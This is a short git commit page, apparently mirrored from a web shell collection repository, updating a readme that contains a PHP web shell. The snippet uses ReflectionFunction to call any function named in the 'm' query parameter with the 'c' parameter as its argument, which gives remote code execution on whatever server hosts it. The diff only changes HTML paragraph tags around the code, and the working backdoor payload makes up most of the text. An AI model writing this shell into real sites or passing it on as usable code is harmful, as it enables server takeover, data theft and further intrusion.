1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-07 05:11:28 +00:00

update readme.md

This commit is contained in:
tennc
2014-07-28 10:05:49 +08:00
parent 635d59bba7
commit fd8b66c4c7

View File

@@ -6,12 +6,9 @@
***************************************************
code:
<?php
<p>
<p><?php
$func = new ReflectionFunction($_GET[m]);
<p>
echo $func->invokeArgs(array($_GET[c]));
<p>
?>
?></p>
***************************************************